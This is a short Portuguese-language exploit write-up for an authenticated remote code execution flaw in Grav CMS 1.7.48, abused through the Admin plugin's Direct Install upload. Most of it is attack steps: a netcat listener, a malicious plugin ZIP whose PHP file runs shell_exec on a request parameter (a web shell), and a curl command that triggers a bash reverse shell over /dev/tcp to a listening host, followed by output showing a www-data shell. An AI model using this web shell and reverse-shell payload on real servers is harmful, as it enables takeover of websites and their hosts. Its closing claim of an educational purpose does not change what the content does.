
Exploit de execução remota de código autenticado para Grav CMS v1.7.48 via upload de plugin malicioso no recurso Direct Install, com prova de conceito e acionador de reverse shell.
O Grav CMS v1.7.48 com o Admin Plugin v1.10.48 é vulnerável a Execução Remota de Código (RCE) através da funcionalidade de upload de plugin "Direct Install", permitindo que administradores autenticados executem código PHP arbitrário no servidor.
/admin/tools/direct-install (Painel Admin > Ferramentas > Direct Install)Prepare um listener:
nc -lvnp 4444
Faça login no Painel Admin do Grav como administrador.
Navegue até Tools > Direct Install
Faça upload de um ZIP de plugin malicioso (evilplugin.zip) estruturado da seguinte forma:
evilplugin/
├── evilplugin.php ← contém: shell_exec($_GET['cmd'])
└── blueprints.yaml ← blueprint mínimo para passar na validação
Acione a reverse shell:
curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/
Reverse shell recebida:
$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on <target-ip>
www-data@target:/var/www/html$ whoami
www-data
/admin/tools/direct-installPara fins educacionais e de defesa apenas.